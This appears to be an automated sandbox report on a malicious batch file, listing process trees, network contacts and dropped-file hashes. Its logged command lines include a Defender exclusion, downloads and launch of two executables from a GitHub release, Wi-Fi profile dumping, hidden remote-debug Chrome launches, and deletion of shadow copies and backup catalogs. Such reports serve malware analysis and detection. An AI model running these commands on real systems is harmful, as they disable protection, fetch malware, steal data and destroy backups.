Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4876 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4876 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 668 wrote to memory of 232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 668 wrote to memory of 232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4876 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 4876 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 4876 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4880 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4576 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4576 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4576 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4576 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4576 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4576 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4576 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4576 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4576 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4880 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2944 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 4880 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4880 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 1772 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 1772 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 4752 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 4752 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:13

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:14

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 104.26.0.100:443 get.geojs.io tcp
GB 142.250.179.228:443 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 104.86.110.104:443 tcp
GB 142.250.179.238:443 apis.google.com udp
GB 216.58.212.206:443 play.google.com udp
GB 216.58.212.206:443 play.google.com udp
US 147.185.221.26:12171 tcp
US 147.185.221.26:12171 tcp
N/A 127.0.0.1:9222 tcp
GB 95.100.153.157:443 www.bing.com tcp
N/A 127.0.0.1:9222 tcp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/3396-0-0x00007FFE33433000-0x00007FFE33435000-memory.dmp

memory/3396-1-0x0000028AE9B40000-0x0000028AE9B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkdvpyjj.mwa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3396-10-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-11-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-12-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-15-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-16-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

memory/5088-18-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 05b3cd21c1ec02f04caba773186ee8d0
SHA1 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512 e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

memory/5088-27-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/5088-31-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 318b7468f95ad6548bb6b631a14863dd
SHA1 77e835ce5092cf8d6b04dbb42a2f4c66e63a1557
SHA256 dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555
SHA512 0fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 3252df0bec85cdcd3668d703ceaf09ce
SHA1 672366ae8df248c078db68a226d1fbf564d2f8ea
SHA256 02fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229
SHA512 179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f

memory/2944-48-0x00000000007B0000-0x00000000007D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd3474e6a72c08266c25f196f78b13fd
SHA1 b70c6bbd7794b49b6b9afa6343987a7f553d1268
SHA256 82acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318
SHA512 cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d

memory/4880-59-0x0000000000F80000-0x0000000000FC4000-memory.dmp

memory/4880-60-0x00000000059D0000-0x00000000059E2000-memory.dmp

memory/4880-61-0x0000000005BC0000-0x0000000005D82000-memory.dmp

memory/4880-63-0x0000000006B40000-0x000000000706C000-memory.dmp

memory/4880-64-0x00000000072E0000-0x0000000007346000-memory.dmp

memory/4880-65-0x0000000007650000-0x00000000076E2000-memory.dmp

memory/4880-143-0x00000000080A0000-0x0000000008646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 aaafa9bad52c6b8832bfe6049e3ea677
SHA1 7c079d194986f77a65bfa3d8f22168e9b584f477
SHA256 bd4bdcc0eb7b4567b94b146b2c36c5e4c423eb3606475b795c64171591fc31aa
SHA512 3d5420df3a27cc8aa9902294b8ae5990e3bdb718a71dc1387546a4b6db444a46d9db25401a391a2c50e0bf528870366fd98144eb5d0ebeb6b4dc7ee64cb91b9b

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

\??\pipe\crashpad_1928_VRLLFTIAFTAZQYCW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 38e61cfd456cf804da8e5d148eacf796
SHA1 0350a98c12d3b1996feca7f0c52be22dcb6079b3
SHA256 0f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8
SHA512 96ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 1d6d1e773c2cb63516dc875f48b6b40c
SHA1 80bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA256 2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512 becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 e4a639b9d8bf7a90cc97bb4e05a36753
SHA1 676facdabf06e5f014e95218bfc02b8c18c39284
SHA256 79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA512 4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

MD5 662e55efd63947ac1ed9ab166fde4448
SHA1 ffdefed29e194510e0c86cb9063c2b6bf4b87223
SHA256 45e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793
SHA512 60b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 541c42f1c98b3e1b011d22eba854e707
